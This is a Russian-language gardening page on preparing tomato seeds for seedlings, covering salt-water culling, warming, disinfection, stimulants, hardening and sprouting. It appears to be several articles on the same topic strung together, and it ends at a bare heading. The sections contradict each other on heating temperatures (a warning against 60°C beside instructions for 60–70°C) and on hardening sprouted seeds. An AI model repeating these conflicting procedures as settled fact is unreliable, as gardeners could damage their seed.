0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как провести подготовку семян помидоров к посадке на рассаду

Как подготовить семена томатов к посеву на рассаду

Подготовка семян томатов к посеву на рассаду в домашних условиях – процедура, с которой каждый огородник сталкивается в конце зимы или начале весны. Одни помещают в грунт сухие зернышки, другие достают посадочный материал за месяц, и проводят с ним массу операций. Урожай получают все. А как правильно? В каких случаях семена можно сеять сразу, и когда они требуют тщательной и длительной подготовки?

Зачем нужна предпосевная обработка семян

Качественный посадочный материал нуждается в минимальной обработке. Полный цикл должны проходить только обладающие сомнительной всхожестью семена. При подготовке к посеву:

  • отбраковываются нежизнеспособные зернышки;
  • улучшается всхожесть;
  • уничтожаются возбудители болезней;
  • слабый посадочный материал проклевывается, что особенно важно при выращивании редкого или ценного сорта, или гибрида;
  • урожай можно получить примерно на неделю раньше;
  • если срок посева был пропущен, стимуляцией посадочного материала его можно наверстать.

Семена томатов дражированные, инкрустированные, или уже подготовленные производителем к посадке другим способом, сажают сухими. Любое вмешательство – даже краткосрочное замачивание или незначительное повреждение оболочки недопустимо.

Как обработать семена томатов перед посадкой

Подготовку семян томатов для посадки на рассаду каждый огородник проводит по-своему. Начинающие склонные совершать множество ненужных действий, рассчитывая, что чем больше процедур провести, тем лучшим будет урожай. Опытные овощеводы тоже нередко обрабатывают его разными способами, не всегда имеющими смысл.

Томаты – культура южная, на родине отлично размножающаяся самосевом. Оболочка у зернышек тонкая, не содержит значительного количества эфирных масел и дубильных веществ. Нет смысла делать с ними то же самое, что с кедровым орехом, семенами укропа или пиона.

Но знать, что собой представляют всевозможные способы предпосадочной подготовки, весьма полезно – это поможет понимать, о чем идет речь в специальной литературе. И обязательно пригодится.

Калибровка

Калибровка представляет собой сортировку семян по размеру (фракциям) так, чтобы их удобнее было высаживать специальными машинами. При этом все зернышки, слишком мелкие или превышающие определенный размер, удаляются.

Провести дома калибровку томатов вручную можно. Для этого их перебирают по зернышку, попутно выбраковывая черные, поврежденные, или имеющие другие дефекты.

На большом объеме без специальных приспособлений сделать это сложно. Томаты огородникам-любителям калибровать необязательно. Большая часть непригодного к посадке материала удаляется во время выбраковки. А вот крупные фермерские хозяйства и агропредприятия, использующие технику, высевают только откалиброванные семена.

Выбраковка

Начальный этап предпосевной подготовки в домашних условиях – выбраковка. Делают насыщенный раствор соли. Для этого сыплют ее в воду до тех пор, пока не перестанет растворяться. Помещают туда семена, размешивают ложкой, оставляют примерно на 20 минут. Потом всплывшие зернышки выбрасывают, а утонувшие промывают и используют для посева.

Можно выдерживать семена томатов в воде с солью меньше. Но тогда надо минут 5 непрерывно размешивать их ложкой, иначе часть качественных зернышек по какой-то причине не успеет намокнуть и опуститься на дно.

Проверка на всхожесть

Подготовка семян помидоров к посеву на рассаду у огородников-любителей редко включает проверку на всхожесть. Ее часто путают с выбраковкой.

Да и проводить проверку имеет смысл только в том случае, когда занимаются выращиванием томатов в промышленных масштабах, а посадочный материал покупают насыпью, и не уверены во всхожести. Правильно проводить процедуру так:

  1. Семена встряхивают, чтобы хорошо перемешались.
  2. Ложкой берут посадочный материал со дна так, чтобы захватить все слои снизу доверху. Ведь в зависимости от веса зернышки окажутся в разных местах, а проверить нужно все.
  3. Считают и взвешивают семена. Записывают данные.
  4. Можно подготовить их замачиванием, или сажать сухими.
  5. Помещают емкость с посевом в благоприятные условия.
  6. Записывают, сколько томатов появилось над поверхностью грунта в момент массового проклевывания.
  7. Сверяют с исходными данными. Вычисляют процент всхожести.

У сортов томатов нормой считается 60-85%. Специально обработанные семена и гибриды дают большую всхожесть.

Такая проверка позволяет рассчитать необходимый вес семян. Выращивание и пикировка рассады – трудоемкий и затратный процесс, требующий привлечения квалифицированного сезонного персонала.

В частных подсобных хозяйствах проверку на всхожесть имеет смысл проводить только в двух случаях. Когда найдены семена особо ценного сорта с неизвестным годом сбора. Или если посадочный материал просрочен, но выбрасывать его жалко.

Обычно томаты считаются обладающими нормальной всхожестью до 5 лет. При правильном же хранении могут использоваться и через 7. Но нуждаются в проверке.

Прогревание

Иногда огородники включают в предпосевную обработку семян томатов длительное, доходящее до месяца прогревание. Обосновывают они это тем, что посадочный материал хранился в прохладном месте и нуждается в медленном доведении температуры до комнатной. А потом проводят закаливание, засовывая семена в холодильник или снег, чередуя обычную и близкую к 0° С температуру. И где тут логика?

В медленном прогревании томаты не нуждаются. Зато им очень полезно быстрое, дающее зародышу сигнал к пробуждению. Краткосрочный прогрев обладает обеззараживающим эффектом, уничтожает часть патогенов на поверхности и внутри зернышка.

Семена высыпают в термос и заливают на 20 минут водой с температурой 53° С. Затем достают и промывают под струей холодной воды, чтобы прекратить тепловые процессы.

Доводить температуру, как советуют некоторые источники, до 60° С категорически не рекомендуется. Как и прогревать посадочный материал полчаса или больше.

Обеззараживание

Обработка семян помидоров перед посадкой на рассаду обязательно должна включать дезинфекцию. Даже на лучшем материале находятся споры грибов и болезнетворные бактерии. Чтобы их убрать, семена нужно протравить.

Легче всего справиться с грибками. Хорошо помогает обеззаразить семена марганцово-кислый калий. Его разводят до насыщенно-розового цвета, процеживают или просто сливают, чтобы нерастворившиеся крупинки не сожгли зернышки. Затем замачивают посадочный материал на 15-20 минут и промывают.

Эффективен от грибных болезней медный купорос (на 1 л воды – 0,1 г препарата) и другие фунгициды. Применять их нужно по инструкции.

От болезней бактериального характера марганцовка не поможет. В этом случае при обработке используют:

  • специальные препараты – используют, придерживаясь инструкции;
  • зеленка – окунают и сразу же достают семена в чистое антисептическое средство, или разводят 1 ч. л. в 100 мл воды и выдерживают 30 минут;
  • настой чеснока – 2 раздавленных зубца настаивают в половине стакана воды ночь, затем на 1 час погружают туда зернышки томатов, промывают;
  • хлоргексидин не разбавляют, семена замачивают на 30 минут;
  • сок алоэ разводят водой в пропорции 1:1, погружают в раствор зернышки томатов, ставят в холодильник на сутки.

Имеет смысл сначала замочить семена томатов в растворе марганцовки от грибных болезней, затем в одном из предложенных средств, чтобы обезопасить их от бактерий. Использовать хлорку категорически не рекомендуется. Она убьет все патогены, но катастрофически снизит всхожесть.

Хороший результат дает замачивание в Фитоспорине или другом биопрепарате, содержащем сенную палочку, обработанного, как описано выше, посадочного материала. Он заселяется полезными микроорганизмами, после чего вредоносным туда сложно проникнуть.

Стимуляция

Этот этап предпосевной подготовки не всегда уместен. Свежие семена в стимуляции не нуждаются. Если искусственно повысить их всхожесть, то прорастут даже зернышки томатов, которые в обычных условиях не должны проклюнуться. Они дадут слабые кустики, с которых невозможно собрать стоящий урожай. Стимуляция мешает естественному отбору.

А вот разбудить посадочный материал, пролежавший несколько лет, нужно. Для этого используют продающиеся в магазинах препараты, действуя строго по инструкции. Или применяют народные средства. Из последних рекомендуется приготовить сок алоэ, разбавив 1:1 или 1:2 водой. Так одновременно к томатам будет применена дезинфекция, стимуляция и краткосрочное закаливание (раствор держат в холодильнике день).

Дополнительно посадочный материал можно насытить полезными веществами. Для этого его обрабатывают путём замачивания в растворе любого комплексного удобрения.

Барботирование

Процедура заключается в насыщении помещенных в воду семян кислородом. В домашних условиях это делают аквариумным компрессором.

Такая подготовка посевного материала имеет смысл для трудно прорастающих культур, ускоряет их всхожесть на 5-8 дней. Особенно полезна она для зонтичных и эфирно-масличных растений.

Томаты и так всходят при температуре 25° С на 3-4 сутки. Если ее понизить до комнатной (18-20° С) – через неделю. Они не нуждаются в барботировании.

Специально для сторонников бесполезных процедур: барботирование томатов проводится 12-20 часов.

Дражирование

Дражирование – предпосадочная подготовка семян путем покрытия специальной оболочкой, содержащей питательные вещества и стимуляторы. Самостоятельно провести процедуру можно, но сложно. Любая ошибка не даст зернышку прорасти.

Лучше ограничиться другими способами обработки, а трудоемкую процедуру оставить производителям. Кстати, стоят такие семена дорого, а всхожесть теряют через 6-9 месяцев. При покупке нужно внимательно смотреть на упаковку, и использовать сразу.

Закаливание

Подготовленные воздействием низких температур семена нужно сразу же сажать. Перед началом операции они должны быть сухими или набухшими, начавшие прорастать закаливанию не подлежат. Иначе посадочный материал испортится.

Самые простые способы закаливания:

  1. Поместить зернышки томатов во влажную ткань, ночью хранить в холодильнике, днем содержать при комнатной температуре. Операция длится 5 суток. Нужно проветривать и осматривать посадочный материал, увлажнять тряпочку.
  2. Завернуть томаты в мешковину или джут. Поместить в сугроб на 2-4 часа. Занести сверток в дом. Операцию повторить несколько раз.

Качественный посадочный материал в такого вида подготовке не нуждается. Его имеет смысл проводить, если семян мало, и нужно, чтобы все взошли.

Проращивание

Еще один необязательный этап подготовки к посеву. Во время проращивания зародыш пробуждается, начинает развиваться. Повернуть процесс вспять уже нельзя.

После набухания первым проклевывается корешок томатов, который часто ошибочно принимают за росток. Как только он сравняется размером с семенем, производят высадку в грунт.

Проращивать томаты лучше на влажной чистой ткани при температуре около 25° С и регулярном проветривании. Если использовать марлю или ватные диски, корешок при отделении легко обломать.

Схемы обработки семян

Когда посадочный материал качественный, собран собственноручно, подготовка семян помидоров к посеву на рассаду может включать в себя минимальное число этапов. Но многих, даже опытных огородников, это почему-то не устраивает, они предпочитают совершить множество ненужных действий, и убить кучу времени.

Если обработка семян помидоров перед посевом просто бесполезна, то вреда она не принесет, а хозяина успокоит. Но можно выстроить такую последовательность действий, которая не только сведет на нет все затраченные ранее усилия, но еще и загубит посадочный материал.

Некоторые операции вообще несовместимы. Классический пример – закаливание и проращивание. Можно проводить только одну из процедур. Если сначала воздействовать на семена низкими температурами, а затем приступить к проращиванию, весь эффект от закаливания сведется к нулю. Когда уже проклюнувшиеся ростки помещают в холодильник или выносят на мороз, они погибают.

Какие этапы следует исключить

Есть процедуры, при подготовке к посадке томатов бесполезные, или применяющиеся в особых случаях. В схемы они включены не будут:

  • калибровку имеет смысл проводить только в крупных хозяйствах специальным аппаратом, перебрать вручную каждое зернышко нереально;
  • проверку на всхожесть проводят с посадочным материалом старым, или имеющим непонятное происхождение;
  • барботирование томатов вообще не имеет смысла;
  • самостоятельное дражирование, скорее всего, не повысит, а снизит всхожесть помидоров, пусть этим занимаются в надлежащих условиях и на профессиональном оборудовании.

Схема 1 – самая проста

Качественные семена, хранящиеся 1-2 года, опытные огородники подготавливают к посеву так:

  • проводят выбраковку;
  • прогревают;
  • замачивают до набухания.

На этом ограничиваются. И из года в год собирают отличный урожай.

Схема 2 – без закаливания

Посадочный материал, всхожесть которого вызывает сомнения, или если «очень хочется» пройти все виды подготовки, проводят поэтапно в следующем порядке:

  1. Выбраковка.
  2. Прогревание.
  3. Обеззараживание.
  4. Стимуляция.
  5. Проращивание.

И высевают в заранее подготовленные емкости.

Схема 3 – без проращивания

Проходят все этапы, указанные в предыдущем пункте, только проращивание заменяют закаливанием. Приступают к посеву томатов на рассаду.

Какую схему подготовки огородник будет применять для семян помидоров – решать только ему. Если захочет пойти длинным путем, пожалуйста, ничего плохого не случится, а любой опыт может пригодиться. Но если посадочный материал качественный, а свободного времени немного, лучше пользоваться первой схемой.

Как проводится подготовка семян томатов для рассады?

Садоводы-новички предполагают, что правильная подготовка семян помидоров к посадке необходима лишь для быстрого всхода рассады. Главная задача заключается в ином — избавлении семян от перезимовавших на них различных бактерий, которые, попадая с семени в землю, сразу же активизируются и начинают уничтожать будущие растения с самого первого дня. Нельзя при подготовке семян к посеву излишне стараться, поскольку неправильная подготовка в виде многочисленного замачивания в различных растворах тоже погубит зародыш.

Опытные овощеводы начинают подготовку к сезону посевов уже в феврале, поскольку любые сорта томатов требуют проведения с ними определенных манипуляций, чтобы получить быстрые всходы и большой урожай.

Если есть желание вырастить качественные помидоры, то следует внимательно отнестись к покупке будущих семян, которые выбраны на рассаду. До того как человек придет в магазин, следует уже точно знать, какие именно сорта томатов необходимо приобрести. Это зависит от региона жительства, поскольку на севере не каждый вид сумеет дать достойный урожай, пока длится теплое время. Среднеспелые и позднеспелые сорта в данных местах успевают дать урожай лишь в теплицах, поэтому следует отдать предпочтение раннеспелым томатам.

Важным фактором является и высота будущего куста. По этому виду сама культура делится на:

  • детерминантные;
  • полудетерминантные;
  • индетерминантные.

Чтобы правильно подготовленные зерна дали хорошую рассаду нужно найти место, где указаны сроки годности на пакетиках. Выбирать лучше семена свежей расфасовки — они всходят намного быстрее, бактерий на них за это время накапливается меньше. Также следует удостовериться, что условия хранения были соблюдены. Семена обязательно должны быть в сухом месте при температуре не выше 18 градусов. Узнать, как хранились семена у производителя, точно невозможно, но лучше проверить упаковку на дефекты. Не следует покупать семена без нормальной упаковки с указанным сроком годности — их всхожесть совершенно не доказана на практике.

Замачивание — это не то, что следует сразу же делать с семенами после того, как их принесли домой. Часто многие семена в упаковке повреждены, поэтому для выращивания они не годятся. Внимательно нужно перебрать все семена, сразу же выкидывая маленькие потемневшие зерна. Ломаные семечки также не принесут пользы. Использовать следует семена бежевого цвета, которые отличаются крупными размерами. Иногда в пачках попадаются семена зеленого или красного цвета. Они тоже годны к использованию. Просто производитель их предварительно уже протравил, облегчив работу.

Предварительно подготовленные семена не требуют какой-либо дополнительной обработки. Единственным возможным действием может быть лишь замачивание.

Эту работу можно облегчить, взяв литр воды. Нужно набрать в банку талой или дождевой — в работе с семенами стоит избегать проточной воды. Ее следует слегка подогреть и растворить ложку соли, а затем просто высыпать семена одного сорта в воду. Через 10 минут после этого необходимо проверить банку. Те семена, что опустились на дно, идеальны для посадки.

Перед тем как начать подготовку семян к последующей посадке, обязательно следует провести процедуру обеззараживания. Такое протравливание поможет быстро избавиться от любых болезнетворных микроорганизмов, которые могут скопиться на оболочке семени. Делается это в растворе марганцовки. Он не должен содержать больше 1% перманганата калия. Замачивание в данной воде должно длиться не более 30 минут. За это время семена приобретут коричневый цвет, поэтому перед погружением во второй раствор их следует очень тщательно промыть.

Для вторичной обработки зерна следует сделать раствор перекиси водорода в 3%. Обязательно нужно прогреть его до тех пор, пока его температура не станет 40 градусов. Оставить семена на 8 минут, а затем вновь их промыть. В условиях такой дезинфекции у бактерий просто не будет шансов.

Сейчас многие опытные огородники советуют обрабатывать томаты в препарате Фитолавин. Он создан на биологической основе со стрептотрициновыми антибиотиками, поэтому не вредит почве и нетоксичен.

Многие производители уже предварительно протравливают семена, которые выставляют на продажу. Продаются такие семена в виде маленьких драже, наклеенных на ленту. Высаживают их в открытый грунт, попросту сделав канавку и положив в нее ленту, которую затем слегка присыпают землей.

Еще одним оригинальным методом является обработка семян в простом солевом растворе. Однако не следует просто всыпать в банку с водой ложку соли. Здесь ее следует заменить древесной золой. Такая подкормка очень качественная, поскольку отмечается последующее стремительное развитие ростков. В таком растворе (1 столовая ложка древесной золы на 1 л воды ) следует оставить зерна как минимум на 10 часов. После окончания процедуры семена обязательно следует промыть чистой водой несколько раз.

Для того чтобы получить качественную помидорную рассаду, во время подготовки семян лучше всего использовать талую воду, которую можно получить из уличного снега или наморозить в морозильной камере. Все ее полезные свойства сохраняются лишь несколько дней, поэтому важно начать проводить все действия сразу же.

Этот способ не считается самым популярным, но он уже доказал свою действенность. Подобная обработка помогает избавиться от всех вредных микробов. Зерна дополнительно лучше всходят, повышается урожайность. Для успешной дезинфекции требуется прогреть зерна томатов при температуре в 30 градусов. Делать это требуется в течение двух суток. Потом нужно повысить температуру до 50 градусов и оставить так семена на еще три дня. Третий этап заключается в прогревании семян при 70 градусах в течение четырех дней.

Такая обработка хоть и является эффективной, но занимает большой промежуток времени. Поэтому был придуман способ сократить его, попросту выкладывая семена прямо на абажур лампы, которая обычно прогревается до 60 градусов. Держать их там следует три часа. Если время не играет особой роли, то зерна можно просто зашить в полотняные мешочки и подвесить их к батарее. За несколько месяцев до посадки они полностью подвергнутся термической дезинфекции.

Сейчас рынок полностью заполнен различными биостимуляторами. На полках можно найти различные средства, такие как Циркон, Экопин, Гумат и многие другие. Все это привело к тому, что большое количество огородников для того, чтобы быстро стимулировать пробуждение зародышей, стали использовать их на всех семенах перед посадкой. Постепенно стали появляться и домашние биостимуляторы вроде сока алоэ, которые выполняют ту же функцию.

Подобная стимуляция имеет право на существование, но у нее есть и побочный эффект. Эти средства способны пробудить даже ослабшие и больные зерна, которые в иных условиях не смогли бы прорости. Рассада, которая выращивается таким способом, очень слабая и часто начинает болеть. Было замечено, что урожай культур, обработанных таким способом, крайне мал.

Для минимизации потерь овощеводы почти не используют биостимуляторы. Делается это лишь в крайних случаях, когда нужно подготовить к посадке сильно пересушенные помидоры, которые хранились долгое время. Биостимуляторы прекрасно способны возродить такой исходный материал. Зерна замачиваются в таком растворе, а затем сразу же высаживаются в грунт, предварительно просушившись. Промывать водой такие семечки не требуется.

Процесс водной термообработки очень важен для пробуждения зародыша в семени томата. Для этой процедуры лучше всего будет воспользоваться обычным термосом. В него заливается горячая вода — ее температура должна быть 60 градусов. В воду следует засыпать один вид будущих томатов. Прикрыть крышку термоса и оставить его на полчаса.

Этот способ замечательно подходит для того, чтобы пробудить зародыши. Однако без последующего замачивания процедура будет неполной. Для него нужно подготовить несколько марлевых мешочков — по одному на каждый сорт помидоров, которые будут высаживаться. Внутрь каждого мешочка засыпаются зерна. После этого следует положить мешочки в банку с талой водой, остуженной до комнатной температуры, на 12 часов. Для лучшего результата можно оставить и на 24 часа. Пока семена замачиваются, каждые 4 часа требуется менять воду, которая за это время забрала вредные микроорганизмы. Пока меняется вода, зерна успеют пропитаться воздухом.

Томат относится к теплолюбивым культурам, поэтому закаливание семян является неотъемлемым шагом во время подготовки. Это помогает растению приспособиться к последующему климату, часто весьма агрессивному. Единого мнения, следует ли закаливать семена до высадки или делать это с уже выросшей рассадой, среди овощеводов нет.

Чтобы закалить семена, требуется взять те из них, что уже прошли процедуру замачивания. Эти семечки следует разложить по тарелке и поставить в холодильник. Средняя температура внутри холодильника +2 градуса. Семена должны простоять в холодном месте 12 часов. Поднос ставится в теплое место с температурой 15-20 градусов на 12 часов.

Чтобы зерна помидоров закалились, процедуру следует повторять еще как минимум два раза.

Семена требуется подвергнуть дополнительной обработке — барботированию. Процедура направлена на то, чтобы обогатить зерна дополнительным кислородом. Когда обеззараживание семян происходит при помощи средства Фитолавин, дополнительно можно провести и барботирование.

Для этого в литре теплой воды разводится одна капля Фитолавина. В воду помещаются зерна. Для обогащения их кислородом потребуется использование аквариумного компрессора. Его нужно установить на банку и дать нагнетать в ней воздух. Делается это на протяжении 12 часов.

По окончании процедуры барботирования семена требуется высушить до такого состояния, чтобы они стали сыпучими. Водой из банки можно полить комнатные растения.

Последним этапом подготовки томатов к последующей посадке на рассаду является их проращивание. Сделать это достаточно легко, требуется лишь взять ткань или марлю и разрезать ее на две части. Между двумя слоями следует разложить зерна, которые прошли все остальные этапы подготовки к посадке. После этого положить ткань на поднос. Периодически подпитывать семена водой, но не стоит их усиленно поливать, чтобы зародыши не вымокли. Требуется ежедневное проветривание зерен, чтобы они не сгнили. Когда оболочка зернышка лопнет, то из нее выступит небольшой росток.

Такое растение — прекрасный посадочный материал, поэтому его нужно сразу же высадить в грунт. Высаживание требует аккуратности, поскольку ростки очень хрупкие. Когда растение было высажено, требуется накрыть горшочки полиэтиленом и поставить все в теплой комнате. Если все было правильно сделано, то первые ростки над землей появятся уже через неделю. Только когда начнут формироваться первые листочки, растение можно будет начать поливать и пикировать по различным горшкам.

Очередность проведения всех процедур необычайна важна! Сначала растение следует замочить, потом продезинфицировать. Лишь потом нужно проводить различные тепловые обработки.

Многие огородники считают, что подготовка семян томатов к последующей посадке на рассаду является целым ритуалом, который в своей основе имеет множество маленьких этапов. Требуется тщательно соблюсти все этапы, чтобы получить хороший урожай, но не уничтожить семя в многочисленных растворах. Получить хороший посадочный материал чисто случайно невозможно, это требует многочисленных трудов и точных действий. Будущие помидоры нельзя оставлять на произвол судьбы, поскольку они являются одними из самых прихотливых растений. Когда выбирается способы подготовки зерен, то нельзя использовать сразу все, лучше выбрать пару-тройку, которые кажутся наиболее эффективными. Обязательными этапами являются два первых — замачивание и обеззараживание, потому что без них нет надежды на то, что можно будет получить высокий урожай.

Рассада, выращенная из правильно подготовленных семян, отличается здоровьем, поэтому с легкостью переносит все последующие манипуляции. Любое отклонение от общепринятой подготовки семян грозит тем, что растение не только вырастет больным, но и вообще не прорастет.

Именно подготовка семян является самым важным этапом для того, чтобы получить качественную рассаду. Тем огородникам, которые попросту пропускают данный этап, не следует ожидать весомых результатов. Процедура подготовки семян достаточно длительная, но при этом не следует лениться во время этого, поскольку именно на данном этапе решается, появится ли летом урожай.

Как провести подготовку семян помидоров к посадке на рассаду

Сезон посева и выращивания томатов начинается задолго до дачных работ. Первым и основным этапом выращивания культуры является подготовка семян помидоров к посадке на рассаду.

Подготовка семян помидоров к посадке на рассаду

Если не соблюдать предпосевную обработку посадочного материала, рассада развивается слабо. Это негативно сказывается и на урожае.

Выбор семян для посадки

Подготовка семян томатов к посеву на рассаду начинается с отбора посадочного материала. Все семена тщательно осматривают. К посадке непригодны семена:

  • неровные;
  • засохшие или поменявшие цвет;
  • с плесенью или налетом;
  • мелкие.

Только здоровое посадочное семя дает здоровое растение. Все непригодные семена выбрасывают, а оставшиеся опускают в солевой раствор: 1 ст. л. соли на 1 ст. воды. Полные семена опускаются на дно, а те, что остаются на поверхности, сеять не рекомендуют: они пустые. После отбора семена промывают под проточной водой и просушивают. Долгий контакт с соленой водой нежелателен. Соль — агрессивный элемент для нежных томатов.

За зиму семена могут подсохнуть, им нужно помочь проснуться. Семена помидоров опускают в стакан с теплой водой на 10-15 минут. За это время пригодные к посадке семена набирают влагу и опускаются на дно.

Обеззараживание семян

Следующим важным этапом подготовки семян томатов к посеву является обеззараживание или протравливание посадочного материала. Этот этап обязателен для проведения, если семена томатов старые, собраны с грядки или есть явные признаки грибка (плесень, налет и т. д.).

Для обеззараживания используют:

  • раствор марганцовки;
  • 3%-ый раствор перекиси водорода;
  • готовые химические препараты.

Для обеззараживания в растворе марганцовки берут 1 г перманганата калия и соединяют с 1 л воды. Жидкость становится малиновой, но не темной. Семена заворачивают в марлю и выдерживают в течение 20 минут, затем тщательно промывают и обсушивают.

Для обеззараживания пергидролем берут обычный раствор перекиси, купленный в аптеке, и подогревают его до 40°С. Семена, завернутые в марлю, опускают на 7-8 минут, потом моют и сушат.

Более удобными и эффективными средствами для протравливания являются препараты Фитоспорин, Эпин, Новосил, Микраса. Они не только обеззараживают семена, но и стимулируют рост, предотвращают фитофтору томатов и другие заболевания.

Закаливание семян

Закаливание повышает иммунитет

Закаливание рекомендуют проводить для сортов, которые будут высаживаться ранней весной. Это поднимет их иммунитет, и семена смогут переносить перепады весенней температуры.

Перед высевом семена томатов заворачивают во влажную марлю. Их помещают в холодильник на 3-5 суток, следя, чтобы ткань оставалась влажной.

Перед закаливанием семена томата 2-3 суток замачиванию в воде до набухания и прорастания 1-2% семян. Закаливание проводят переменными температурами в течение 10-15 дней: 10-12 часов при температуре 1-3 градуса, 10-12 часов — при температуре 18-20 градусов.

Если семена помидоров хранились в холодном помещении, их прогревают в тканевом мешочке на батарее в течение 3-4 дней. Температура выше 40°С губит ростки и пересушивают семена. Если батареи очень горячие, семена прогревают в духовке, тщательно следя за температурой. Магазинные семена не нуждаются в проведении подобных мероприятий.

Сухие семена томата в состоянии выдерживать кратковременно большой диапазон температур от -180 градусов до +85 градусов. Прогревают семена томата в течение 4-6 часов при температуре до +50 градусов.

Обогащение семян питательными и активными веществами

Для этого используют как покупные препараты («Эпин», гумат калия, борную кислоту), так и народные средства (сок алое, картофеля).

Если используют препараты широкого спектра действия, такие как «Эпин», обеззараживание и подкормка проходят одноэтапно. Через 4-6 часов подготовка семян томатов к посеву завершена.

Часто для обогащения используют сок алое. Он обладает антибактериальным, обеззараживающим действием и отлично питает будущие растения. Единственный минус такого удобрения — длительность приготовления рабочего раствора.

Листья алое нарезают небольшими кусочками, опускают в кастрюлю или другую высокую емкость и хорошо разминают до образования каши, затем в стакан воды добавляют 1 ст. л. измельченных листьев и перемешивают. Воду накрывают, ставят в темное прохладное место на 1 неделю. Спустя 7 дней удобрение высокой концентрации готово. Перед применением объем доводят до 5 л. Для разведения используют только кипяченую воду комнатной температуры или дистиллированную.

Из стимуляторов роста для обогащения семян чаще всего используют янтарную кислоту (15 мг на 1 л воды ) и гетероауксин (25 мг на 1 л воды).

Замачивание

Иногда подготовка семян помидоров к посеву требует предварительного замачивания. Его проводят, если семена старые, долго хранившиеся. Завернутые во влажную ткань семена кладут в темное теплое место на 36-48 часов. Для замачивания можно использовать питательный раствор вместо воды: так семена сохранят силы.

Замачивание — давно известный прием, способствующий получению более ранних, чем от сухих семян всходов. От этого сбор урожая начинают на 2-7 дней раньше.

Проращивание

Садоводы используют технику проращивания семян. Это позволяет определить, какие семена не дадут всходов, и удалить их. Проращивание способствует быстрому пробуждению и росту.

Завернутые в марлю или тонкую вату семена до появления ростков опускают в воду комнатной температуры. Проверять прорастание нужно аккуратно, чтобы не оторвать нежные ростки. Проращивать желательно в теплом месте, следя за уровнем увлажненности. Как только появятся первые ростки, томаты пересаживают в подготовленный грунт.

Проращивание семян томата ведут при температуре +25 градусов.Продолжительность проращивания семян томата составляет 4-5 дней. Ежедневно воду, в которой находятся семена, меняют. Высаживать в грунт пророщенные семена томата намного сложнее, чем сухие или просто намоченные.

Как подготовить семена томатов к посеву

Каждый огородник, занимающийся выращиванием томатов, хочет получить богатый урожай. В наших климатических условиях это довольно непростая задача, многое зависит от начальной стадии посева этой требовательной теплолюбивой культуры. С наступлением сезонных работ перед овощеводами стоит главная задача – как подготовить семена томатов к посеву.

Предпосевная подготовка – очень важный момент, если уделить ей недостаточное внимание, то есть вероятность потерять львиную долю урожая.

Самый распространенный состав грунта под посадку семян томатов:

  • торф – 3 части,
  • перегной – 2 части,
  • дерновая земля – 1 часть.

Почву следует обработать и внести удобрения.

Для дезинфекции грунта его можно проморозить или прокалить в духовке.

Удобрения на 1 ведро смеси:

  • зола – 1 ст.,
  • мочевина – 1 ч.л.,
  • суперфосфат – 1 ст.л.

Покупайте готовые почвенные смеси только в проверенных специализированных магазинах!

Полезно будет приготовить смесь заранее и за 2 недели до посева увлажнить ее – это поможет развиться полезным микроорганизмам.

Когда начинать подготовку семян? Ознакомьтесь с календарем посадки томатов на 2018 год.

Обязательные методы подготовки семян томатов к посеву

Чтобы получить качественную рассаду, можно применить несколько способов подготовки семян томатов к посеву. Каждый огородник выбирает для себя лучший метод.

Обязательно придерживайтесь указанной последовательности действий!

Сортировка

Первоначальный этап подготовки семян к посадке – сортировка . Посадочный материал должен быть хорошего качества, обязательно проведите выбраковку по следующему принципу:

  • Отбирайте крупные и тяжелые семечки – из них вырастет более крепкая и здоровая рассада.
  • В приготовленный солевой раствор (пропорции: чайная ложка на стакан воды) опустите отобранный посадочный материал на пятнадцать минут.
  • Всплывшие семена, не пригодные для посева, выбросьте.
  • Осевшие на дно зернышки промойте в чистой воде и просушивите.

Срок хранения семян томатов 4-5 лет.

Прогревание

Семенной материал для лучшей сохранности держат в прохладном помещении, поэтому задолго до посева его следует прогреть.

За месяц до посадки семян в грунт их вносят в теплое помещение. Несколько дней их можно подержать возле отопительных приборов. Это усилит прогрев и оживит зернышки томатов.

Протравливание или обеззараживание

На семенной оболочке могут присутствовать возбудители некоторых болезней томатов, которые способны заразить рассаду, поэтому необходима их дополнительная дезинфекция.

Семена помещаются в ярко-розовый раствор марганцовки , где они обеззараживаются в течение получаса. Затем их следует промыть и просушить.

Кроме марганцовки можно использовать Фитоспорин или другие аналогичные препараты, которые разводят по инструкции.

После процесса протравливания взрослые растения томата будет меньше подвержены заболеваниям.

Обработка стимуляторами или насыщение питательными веществами

Процедуру проводят за сутки до высадки, не раньше. Стимуляторы можно приобрести в специализированном магазине или приготовить самостоятельно. Температуру поддерживать не меньше +20ºC.

Рекомендуется использовать талую воду.

Из картофеля или алоэ выдавливается сок и немного разводится водой. Семена на один день помещаются в один из этих питательных растворов.

Зольный раствор для обогащения микроэлементами: 1 ч.л. размешивают в стакане горячей воды и настаивают сутки. Затем выдерживают в нем в течение 4-5 часов семена.

Промышленные препараты : Циркон, Эпин (1 кап на 1 ст.) в течении 16-18 часов.

Обработка стимуляторами проводится только после обеззараживания!

После стимуляции посадочный материал не промывается, а только просушивается. Такая процедура способствует быстрой и одновременной всхожести рассады.

Замачивание

Для этого процесса семена помещаются в тонкую легкую ткань и увлажняются водой комнатной температуры. Жидкости должно быть небольшое количество, чтобы она только слегка прикрывала ткань с посадочным материалом.

Намачивание семян должно происходить не более двенадцати часов. Эта процедура дает возможность семенам пропитаться необходимой влагой. Разбухшие зерна томатов раньше дадут побеги.

Возможные этапы подготовки семян к посеву

Для подготовки посадочного материала томата есть способы, которые применяют не слишком часто и здесь мнения овощеводов расходятся. Некоторые пользуются именно этими методами.

Проращивание семян томатов

Зернышки заворачиваются в тонкий слой ткани, выкладываются в плоскую посуду и увлажняются.

В помещении, где прорастает посадочный материал, температура воздуха не должна быть высокой – это способствует быстрому просыханию ткани, а такого допустить нельзя. Если влага испарится – зерна просохнут и потеряют возможность дать качественную рассаду.

На проращивание семян томатов уходит 3-4 дня.

Некоторые огородники хорошо знают, как замачивать семена помидоров для проращивания и используют этот метод. Но большая часть садоводов не видят смысла в таком способе подготовки семян к посеву.

Закаливание

Можно провести процедуру двумя способами.

Семена после замачивания 1-2 дня выдерживают в холодильнике при температуре 0ºC или закапывают в снег.

Пророщенные семена томатов в марле помещаются в самое холодное место холодильника (обычно под морозилкой) на несколько часов. Необходима температура около 0ºC. Затем переносят в теплое помещение на 12 ч. Подобным образом чередуют 3-7 дней.

Не допускайте подсыхания!

Способ закаливания вырабатывает устойчивость будущего растения к температурным перепадам. Этот этап подготовки семян считается необязательным.

Советуем для закаливания использовать семена возрастом не больше 2 лет.

Барботирование

